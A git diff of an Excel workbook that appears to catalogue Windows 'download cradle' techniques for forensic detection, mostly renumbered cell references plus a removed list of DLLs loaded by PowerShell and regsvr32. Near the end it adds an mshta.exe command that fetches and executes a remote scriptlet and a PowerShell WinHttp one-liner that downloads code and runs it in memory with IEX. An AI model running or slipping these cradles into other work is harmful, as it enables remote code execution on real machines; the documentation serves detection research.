     <row r="29" spans="1:2" ht="7" customHeight="1">
       <c r="A29" s="37"/>
       <c r="B29" s="38"/>
     </row>
-    <row r="30" spans="1:2" ht="32">
+    <row r="30" spans="1:2" ht="48">
       <c r="A30" s="36" t="s">
-        <v>64</v>
+        <v>221</v>
       </c>
       <c r="B30" s="36" t="s">
-        <v>101</v>
+        <v>93</v>
       </c>
     </row>
     <row r="31" spans="1:2" ht="7" customHeight="1">
@@ -12239,10 +12229,10 @@
     </row>
     <row r="32" spans="1:2" ht="144">
       <c r="A32" s="36" t="s">
-        <v>65</v>
+        <v>222</v>
       </c>
       <c r="B32" s="31" t="s">
-        <v>137</v>
+        <v>126</v>
       </c>
     </row>
     <row r="33" spans="1:2" ht="7" customHeight="1">
@@ -12251,10 +12241,10 @@
     </row>
     <row r="34" spans="1:2" ht="128">
       <c r="A34" s="36" t="s">
-        <v>66</v>
+        <v>60</v>
       </c>
       <c r="B34" s="36" t="s">
-        <v>103</v>
+        <v>94</v>
       </c>
     </row>
     <row r="35" spans="1:2" ht="7" customHeight="1">
@@ -12263,10 +12253,10 @@
     </row>
     <row r="36" spans="1:2" ht="48">
       <c r="A36" s="51" t="s">
-        <v>100</v>
+        <v>92</v>
       </c>
       <c r="B36" s="52" t="s">
-        <v>99</v>
+        <v>91</v>
       </c>
     </row>
     <row r="37" spans="1:2" ht="7" customHeight="1">
@@ -12302,10 +12292,10 @@
         <v>45</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -12316,13 +12306,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>104</v>
+        <v>95</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>104</v>
+        <v>95</v>
       </c>
       <c r="D2" s="10" t="s">
-        <v>104</v>
+        <v>95</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="64">
@@ -12341,13 +12331,13 @@
     </row>
     <row r="4" spans="1:4" ht="128">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>152</v>
+        <v>141</v>
       </c>
       <c r="C4" s="10" t="s">
-        <v>108</v>
+        <v>97</v>
       </c>
       <c r="D4" s="10" t="s">
         <v>46</v>
@@ -12355,16 +12345,16 @@
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -12386,41 +12376,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="27" t="s">
-        <v>161</v>
+        <v>150</v>
       </c>
       <c r="C7" s="27" t="s">
-        <v>162</v>
+        <v>151</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>197</v>
+        <v>186</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="152">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>150</v>
+        <v>139</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>117</v>
+        <v>106</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>117</v>
+        <v>106</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="44" t="s">
-        <v>151</v>
+        <v>140</v>
       </c>
       <c r="C9" s="6" t="s">
-        <v>110</v>
+        <v>99</v>
       </c>
       <c r="D9" s="27" t="s">
-        <v>111</v>
+        <v>100</v>
       </c>
     </row>
   </sheetData>
@@ -12453,10 +12443,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="45" t="s">
         <v>44</v>
@@ -12467,10 +12457,10 @@
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>105</v>
+        <v>96</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>105</v>
+        <v>96</v>
       </c>
       <c r="D2" s="27" t="s">
         <v>48</v>
@@ -12481,10 +12471,10 @@
         <v>2</v>
       </c>
       <c r="B3" s="10" t="s">
-        <v>70</v>
+        <v>64</v>
       </c>
       <c r="C3" s="10" t="s">
-        <v>70</v>
+        <v>64</v>
       </c>
       <c r="D3" s="45" t="s">
         <v>47</v>
@@ -12492,10 +12482,10 @@
     </row>
     <row r="4" spans="1:4" ht="32">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>152</v>
+        <v>141</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>17</v>
@@ -12506,13 +12496,13 @@
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="D5" s="7" t="s">
         <v>47</v>
@@ -12537,10 +12527,10 @@
         <v>8</v>
       </c>
       <c r="B7" s="4" t="s">
-        <v>163</v>
+        <v>152</v>
       </c>
       <c r="C7" s="7" t="s">
-        <v>164</v>
+        <v>153</v>
       </c>
       <c r="D7" s="45" t="s">
         <v>47</v>
@@ -12548,13 +12538,13 @@
     </row>
     <row r="8" spans="1:4" ht="48">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>121</v>
+        <v>110</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>121</v>
+        <v>110</v>
       </c>
       <c r="D8" s="45" t="s">
         <v>47</v>
@@ -12562,13 +12552,13 @@
     </row>
     <row r="9" spans="1:4" ht="276">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="6" t="s">
-        <v>110</v>
+        <v>99</v>
       </c>
       <c r="C9" s="6" t="s">
-        <v>110</v>
+        <v>99</v>
       </c>
       <c r="D9" s="45" t="s">
         <v>47</v>
@@ -12605,10 +12595,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -12635,21 +12625,21 @@
         <v>2</v>
       </c>
       <c r="B3" s="10" t="s">
-        <v>119</v>
+        <v>108</v>
       </c>
       <c r="C3" s="10" t="s">
-        <v>119</v>
+        <v>108</v>
       </c>
       <c r="D3" s="44" t="s">
-        <v>91</v>
+        <v>83</v>
       </c>
     </row>
     <row r="4" spans="1:6" ht="128">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>154</v>
+        <v>143</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -12660,7 +12650,7 @@
     </row>
     <row r="5" spans="1:6">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
         <v>53</v>
@@ -12691,38 +12681,38 @@
         <v>8</v>
       </c>
       <c r="B7" s="17" t="s">
-        <v>208</v>
+        <v>197</v>
       </c>
       <c r="C7" s="17" t="s">
-        <v>209</v>
+        <v>198</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>210</v>
+        <v>199</v>
       </c>
     </row>
     <row r="8" spans="1:6" ht="290">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="17" t="s">
-        <v>165</v>
+        <v>154</v>
       </c>
       <c r="C8" s="17" t="s">
-        <v>166</v>
+        <v>155</v>
       </c>
       <c r="D8" s="17" t="s">
-        <v>199</v>
+        <v>188</v>
       </c>
     </row>
     <row r="9" spans="1:6" ht="409.6">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="17" t="s">
-        <v>160</v>
+        <v>149</v>
       </c>
       <c r="C9" s="17" t="s">
-        <v>116</v>
+        <v>105</v>
       </c>
       <c r="D9" s="17" t="s">
         <v>49</v>
@@ -12758,10 +12748,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -12786,21 +12776,21 @@
         <v>2</v>
       </c>
       <c r="B3" s="26" t="s">
-        <v>118</v>
+        <v>107</v>
       </c>
       <c r="C3" s="26" t="s">
-        <v>118</v>
+        <v>107</v>
       </c>
       <c r="D3" s="44" t="s">
-        <v>92</v>
+        <v>84</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="128">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>154</v>
+        <v>143</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -12811,16 +12801,16 @@
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>81</v>
+        <v>75</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>81</v>
+        <v>75</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>81</v>
+        <v>75</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="64">
@@ -12842,41 +12832,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>205</v>
+        <v>194</v>
       </c>
       <c r="C7" s="17" t="s">
-        <v>206</v>
+        <v>195</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>207</v>
+        <v>196</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="332">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="54" t="s">
-        <v>167</v>
+        <v>156</v>
       </c>
       <c r="C8" s="17" t="s">
-        <v>123</v>
+        <v>112</v>
       </c>
       <c r="D8" s="17" t="s">
-        <v>198</v>
+        <v>187</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="28" t="s">
-        <v>124</v>
+        <v>113</v>
       </c>
       <c r="C9" s="28" t="s">
-        <v>124</v>
+        <v>113</v>
       </c>
       <c r="D9" s="28" t="s">
-        <v>124</v>
+        <v>113</v>
       </c>
     </row>
   </sheetData>
@@ -12909,10 +12899,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -12943,15 +12933,15 @@
         <v>1</v>
       </c>
       <c r="D3" s="27" t="s">
-        <v>93</v>
+        <v>85</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="27" t="s">
-        <v>153</v>
+        <v>142</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>20</v>
@@ -12962,16 +12952,16 @@
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>82</v>
+        <v>76</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>82</v>
+        <v>76</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>82</v>
+        <v>76</v>
       </c>
     </row>
     <row r="6" spans="1:4" ht="112">
@@ -12979,7 +12969,7 @@
         <v>7</v>
       </c>
       <c r="B6" s="17" t="s">
-        <v>157</v>
+        <v>146</v>
       </c>
       <c r="C6" s="17" t="s">
         <v>10</v>
@@ -12993,35 +12983,35 @@
         <v>8</v>
       </c>
       <c r="B7" s="27" t="s">
-        <v>203</v>
+        <v>192</v>
       </c>
       <c r="C7" s="50" t="s">
-        <v>204</v>
+        <v>193</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>219</v>
+        <v>208</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="246">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="30" t="s">
-        <v>158</v>
+        <v>147</v>
       </c>
       <c r="C8" s="30" t="s">
-        <v>120</v>
+        <v>109</v>
       </c>
       <c r="D8" s="30" t="s">
-        <v>200</v>
+        <v>189</v>
       </c>
     </row>
     <row r="9" spans="1:4">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="28" t="s">
-        <v>159</v>
+        <v>148</v>
       </c>
       <c r="C9" s="28" t="s">
         <v>13</v>
@@ -13060,10 +13050,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="25" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -13074,13 +13064,13 @@
         <v>5</v>
       </c>
       <c r="B2" s="10" t="s">
-        <v>226</v>
+        <v>215</v>
       </c>
       <c r="C2" s="10" t="s">
-        <v>226</v>
+        <v>215</v>
       </c>
       <c r="D2" s="10" t="s">
-        <v>226</v>
+        <v>215</v>
       </c>
     </row>
     <row r="3" spans="1:4" ht="32">
@@ -13094,15 +13084,15 @@
         <v>3</v>
       </c>
       <c r="D3" s="45" t="s">
-        <v>94</v>
+        <v>86</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="48">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>168</v>
+        <v>157</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -13113,16 +13103,16 @@
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -13144,41 +13134,41 @@
         <v>8</v>
       </c>
       <c r="B7" s="7" t="s">
-        <v>169</v>
+        <v>158</v>
       </c>
       <c r="C7" s="7" t="s">
-        <v>170</v>
+        <v>159</v>
       </c>
       <c r="D7" s="55" t="s">
-        <v>201</v>
+        <v>190</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="32">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="7" t="s">
-        <v>202</v>
+        <v>191</v>
       </c>
       <c r="C9" s="7" t="s">
-        <v>202</v>
+        <v>191</v>
       </c>
       <c r="D9" s="7" t="s">
-        <v>202</v>
+        <v>191</v>
       </c>
     </row>
   </sheetData>
@@ -13211,10 +13201,10 @@
         <v>18</v>
       </c>
       <c r="B1" s="9" t="s">
-        <v>149</v>
+        <v>138</v>
       </c>
       <c r="C1" s="18" t="s">
-        <v>109</v>
+        <v>98</v>
       </c>
       <c r="D1" s="25" t="s">
         <v>44</v>
@@ -13245,15 +13235,15 @@
         <v>4</v>
       </c>
       <c r="D3" s="45" t="s">
-        <v>94</v>
+        <v>86</v>
       </c>
     </row>
     <row r="4" spans="1:4" ht="32" customHeight="1">
       <c r="A4" s="14" t="s">
-        <v>112</v>
+        <v>101</v>
       </c>
       <c r="B4" s="10" t="s">
-        <v>168</v>
+        <v>157</v>
       </c>
       <c r="C4" s="10" t="s">
         <v>19</v>
@@ -13264,16 +13254,16 @@
     </row>
     <row r="5" spans="1:4">
       <c r="A5" s="13" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="B5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="C5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="D5" s="7" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
     </row>
     <row r="6" spans="1:4">
@@ -13295,32 +13285,32 @@
         <v>8</v>
       </c>
       <c r="B7" s="54" t="s">
-        <v>176</v>
+        <v>165</v>
       </c>
       <c r="C7" s="7" t="s">
-        <v>175</v>
+        <v>164</v>
       </c>
       <c r="D7" s="35" t="s">
-        <v>211</v>
+        <v>200</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
       <c r="A8" s="13" t="s">
-        <v>72</v>
+        <v>66</v>
       </c>
       <c r="B8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="C8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
       <c r="D8" s="7" t="s">
-        <v>122</v>
+        <v>111</v>
       </c>
     </row>
     <row r="9" spans="1:4" ht="64">
       <c r="A9" s="13" t="s">
-        <v>73</v>
+        <v>67</v>
       </c>
       <c r="B9" s="7" t="s">
         <v>57</v>

--- a/other/DownloadCradle/DownloadCradle.xlsx
+++ b/other/DownloadCradle/DownloadCradle.xlsx
@@ -29,15 +29,16 @@
     <sheet name="Bitsadmin" sheetId="18" r:id="rId15"/>
     <sheet name="Certutil" sheetId="16" r:id="rId16"/>
     <sheet name="regsvr32" sheetId="19" r:id="rId17"/>
-    <sheet name="mshta" sheetId="20" r:id="rId18"/>
-    <sheet name="nslookup" sheetId="22" r:id="rId19"/>
+    <sheet name="wmic" sheetId="30" r:id="rId18"/>
+    <sheet name="mshta" sheetId="20" r:id="rId19"/>
+    <sheet name="nslookup" sheetId="22" r:id="rId20"/>
   </sheets>
   <calcPr calcId="0"/>
 </workbook>
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="651" uniqueCount="228">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="690" uniqueCount="243">
   <si>
     <t>None</t>
   </si>
@@ -5491,189 +5492,6 @@
 C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE\JIIN83V6
 C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE
 C:\Windows\cerD555.tmp</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <t xml:space="preserve">Powershell.exe loads additional modules
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
-DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
-Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
-System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
-Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
-cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
-System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
-Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
-.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>Regsvr32.exe loads:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Windows StateRepository Proxy/Stub Server - C:\Windows\System32\Windows.StateRepositoryPS.dll
-EDP util - C:\Windows\System32\edputil.dll
-Filter Library - C:\Windows\System32\fltLib.dll
-OneCoreUAP Common Proxy Stub - C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
-Network Explorer - C:\Windows\System32\networkexplorer.dll
-Application Experience Program Cache - C:\Windows\System32\aepic.dll
-Cloud API user mode API - C:\Windows\System32\cldapi.dll
-Microsoft Property System - C:\Windows\System32\propsys.dll
-Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
-Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
-Group Policy Client API - C:\Windows\System32\gpapi.dll
-Software Licensing Client Dll - C:\Windows\System32\sppc.dll
-Software Licensing Client Dll - C:\Windows\System32\slc.dll
-Client Interface - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\MpClient.dll
-Microsoft ® JScript - C:\Windows\System32\jscript.dll
-Fusion 2.5 - C:\Windows\System32\sxs.dll
-Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
-Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
-Windows Shell Common Dll - C:\Windows\System32\shell32.dll
-Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
-IOfficeAntiVirus Module - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\MpOAV.dll
-Userenv - C:\Windows\System32\userenv.dll
-Anti-Malware Scan Interface - C:\Windows\System32\amsi.dll
-Windows Lockdown Policy - C:\Windows\System32\wldp.dll
-COM+ Configuration Catalog - C:\Windows\System32\clbcatq.dll
-Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
-Crypto Network Related API - C:\Windows\System32\cryptnet.dll
-Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
-Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
-Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
-TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
-FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
-Windows ® Script Component Runtime - C:\Windows\System32\scrobj.dll
-Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">
-Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
-Cryptographic Service Provider API - C:\Windows\System32\cryptsp.dll
-Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
-Data Protection API - C:\Windows\System32\dpapi.dll
-ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
-Crypto API32 - C:\Windows\System32\crypt32.dll
-NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
-Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
-Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
-Windows HTTP Services - C:\Windows\System32\winhttp.dll
-On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
-Windows Socket 2.0 32-Bit DLL - C:\Windows\System32\ws2_32.dll
-Security Support Provider Interface - C:\Windows\System32\sspicli.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t xml:space="preserve">Internet Extensions for Win32 - C:\Windows\System32\wininet.dll
-</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="10"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>Isolation Library for Internet Explorer - C:\Windows\System32\msIso.dll
-Base cryptographic API DLL - C:\Windows\System32\cryptbase.dll
-Windows NT Image Helper - C:\Windows\System32\imagehlp.dll
-User Profile Basic API - C:\Windows\System32\profapi.dll
-Power Profile Helper DLL - C:\Windows\System32\powrprof.dll
-Microsoft WinRT Storage API - C:\Windows\System32\windows.storage.dll
-Run time utility for Internet Explorer - C:\Windows\System32\iertutil.dll
-OLE32 Extensions for Win32 - C:\Windows\System32\urlmon.dll</t>
     </r>
   </si>
   <si>
@@ -9105,115 +8923,376 @@
     </r>
   </si>
   <si>
-    <t>Microsoft BITS framework via Bitsadmin.exe
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>MSHTA.EXE</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+cmd /c 'mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/mgreen27/testing/master/mshta.sct").Exec();close()'
+Proxy aware
+</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell WinHttp COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+$comWinHttp=new-object -com WinHttp.WinHttpRequest.5.1;$comWinHttp.open('GET',$Url,$false);$comWinHttp.send();IEX $comWinHttp.responseText 
+Powershell version: 2+
+Not proxy aware
+memory only</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
